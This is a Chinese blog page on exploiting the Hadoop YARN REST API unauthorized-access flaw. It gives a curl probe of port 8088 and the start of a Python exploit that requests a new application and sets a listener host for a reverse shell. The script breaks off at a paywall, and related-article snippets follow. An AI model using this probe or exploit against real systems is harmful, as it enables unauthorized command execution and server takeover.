hadoop漏洞_Hadoop Yarn REST API未授权漏洞利用

最新推荐文章于 2024-05-20 08:00:00 发布
最新推荐文章于 2024-05-20 08:00:00 发布
阅读量647 收藏
点赞数
文章标签: hadoop漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39994627/article/details/111751959
版权

Hadoop Yarn REST API未授权漏洞利用

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。

yarn默认开发8088和8089端口。

检测漏洞存在方式:

curl -X POST 172.16.20.134:8088/ws/v1/cluster/apps/new-application

返回如下请求证明存在

漏洞利用python代码 :

import requests

target = 'http://172.16.20.134:8088/'

lhost = '172.16.20.108' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'

resp = requests.post(url)

print(resp.text)

app_id = resp.json()['application-id']

url = target + 'ws/v1/cluster/apps'

data = {

&

最低0.47元/天 解锁文章
weixin_39994627
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hadoop授权命令执行
jammny
11-15 1554
前言: Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令,yarn默认开发8088和8089端口。 漏洞利用: 利用exp反弹shell: 访问漏洞页面,这是Hadoop YARN ResourceManager.
数据库安全:Hadoop 授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3536
Hadoop 授权访问主要因HadoopYARN资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
Hadoop/Yarn REST API授权访问漏洞
weixin_44455388的博客
09-27 4278
一、基本情况 漏洞分布:所有版本 漏洞级别:高危 漏洞类别:授权漏洞 漏洞URL: http://25.215.209.1:19888/ http://25.215.209.1:50070/ http://25.215.209.1:50090/ http://25.215.209.1:50075/ http://25.215.209.1:8088/cluster 二、漏洞描述 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的
授权访问:Hadoop 授权访问漏洞
qq_68163788的博客
05-20 1149
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
Hadoop Yarn REST API授权漏洞排查
dayouzi的博客
08-14 622
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。
hadoop应用开发技术..._渗透技巧Hadoop命令执行
weixin_39895486的博客
11-29 267
0X00Hadoop介绍和漏洞原理Hadoop是一个由Apache的分布式系统基础架构,用户可开发分布式程序,充分利用集群的威力进行高速运算和存储,实现了一个分布式文件系统(Hadoop Distributed File System)。其中HDFS组件有高容错性的特点,并且部署在低廉的(low-cost)硬件上即可提供高吞吐量(high throughput)来访问应用程序的数...
Hadoop Yarn RPC授权访问漏洞_hadoop yarn授权访问漏洞修复如何开启身份验证
2401_83947353的博客
04-17 323
一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
漏洞复现】Hadoop YARN 资源管理系统 REST API授权访问
weixin_43486390的博客
12-18 4331
0x01 概述 Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,YarnHadoop集群的资源管理系统。YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当可导致授权访问的问题,攻击者无需认证即可通过REST API部署任务来执行任意指令,最终完全控制服务器。 0x02 影响范围 (1)Apache Hadoop YARN资源管理系统 (2)对外
hadoop-yarn-api-python-client:Hadoop:registered:YARN API的Python客户端
05-08
hadoop-yarn-api-python-client 适用于ApacheHadoop:registered:YARN API的Python客户端 软件包文档: REST API文档: 兼容性库与Apache Hadoop 3.2.1兼容。 如果您使用的版本不是上述版本(或类似Hortonworks的供应...
Hadoop Yarn - Apache - Cloudera - APIs
最新发布
06-22
Tuning Apache Hadoop YARN 4 YARN tuning overview4 Step 1: Worker host configuration8 Step 2: Worker host planning 8 Step 3: Cluster size9 Steps 4 and 5: Verify settings9 Step 6: Verify container ...
apache hadoop 2.7.2.chm
10-24
WebHDFS REST API HttpFS Gateway Short Circuit Local Reads Centralized Cache Management HDFS NFS Gateway HDFS Rolling Upgrade Extended Attributes Transparent Encryption HDFS Support for ...
hadoop_the_definitive_guide_3nd_edition
07-08
Hadoop definitive 第三版, 目录如下 1. Meet Hadoop . . . 1 Data! 1 Data Storage and Analysis 3 Comparison with Other Systems 4 RDBMS 4 Grid Computing 6 Volunteer Computing 8 A Brief History of Hadoop 9...
Apache Hadoop---Oozie.docx
06-12
1. 外部接口层:对外提供JAVA APIREST API、命令行接口(CLI)和Web UI(如Hue)。 2. 中间处理层:包括Oozie的工作流引擎、协调器、捆绑器和服务水平协议组件,负责任务的调度和执行。 3. 数据存储层:Oozie对象...
Hadoop YARN中web服务的REST API介绍
张伟的专栏
07-25 716
Hadoop YARN中web服务的REST API介绍
Hadoop 授权访问漏洞总结
qq_45746681的博客
10-05 6037
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、Hadoop 授权访问漏洞是什么?二、复现1.搭建环境2.复现 前言 记录下常见的授权访问漏洞 一、Hadoop 授权访问漏洞是什么? Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。 二、复现 1
数据库服务安全--Mysql授权--Hadoop授权配合RCE--Redis授权&RCE
weixin_68243135的博客
11-21 2208
数据库安全漏洞--MySQL--Hadoop--Redis
针对Hadoop YARNREST API web服务介绍
weixin_34341117的博客
09-14 639
打开微信扫一扫,关注微信公众号【数据与算法联盟】 转载请注明出处:http://blog.csdn.net/gamer_gyt 博主微博:http://weibo.com/234654758(欢迎互撩)Github:https://github.com/thinkgamer ===================================...
Hadoop Yarn RPC远程命令执行
Fly_鹏程万里
11-25 5853
影响范围 Hadoop Yarn RPC 漏洞类型 远程命令执行 利用条件 可授权访问 漏洞概述 2021年11月15日,有安全研究人员披露Hadoop Yarn RPC存在授权访问漏洞,此漏洞存在于Hadoop的核心组件Hadoop Yarn中,因Hadoop Yarn默认对外开放RPC服务,导致远程攻击者可利用此授权漏洞并通过RPC服务执行任意命令,从而达到控制目标服务器的目的,鉴于此漏洞为高危状态,危害较大,且细节已公开、被在野利用,建议所有使用Apache Hadoop的用户及时
Hadoop Yarn REST API授权漏洞利用
weixin_30564901的博客
08-21 1079
   Hadoop Yarn REST API授权漏洞利用 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARNhadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关...
Hadoop yarn
05-15
Hadoop YARN(Yet Another Resource Negotiator)是Apache Hadoop生态系统中的一个组件,用于集群管理和资源调度。它是Hadoop 2.0中引入的新特性,是一种通用的资源管理系统,可以管理Hadoop集群中的计算和存储资源,为各种应用程序提供统一的资源调度和管理。 YARN的主要功能是将计算和存储分离,使得Hadoop集群可以同时运行多种不同类型的应用程序,例如MapReduce、Spark、Storm等。YARN通过将计算框架和资源管理分离,可以提高集群的利用率和灵活性,使得用户可以更加方便地开发和部署分布式应用程序。 YARN的核心组件包括ResourceManager和NodeManager。ResourceManager负责整个集群的资源管理和调度,而NodeManager则负责单个节点的资源管理和任务执行。 YARN还提供了一些API和工具,用于管理和监控集群的资源使用情况,如YARN REST APIYARN Timeline Service、YARN Application History Service等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值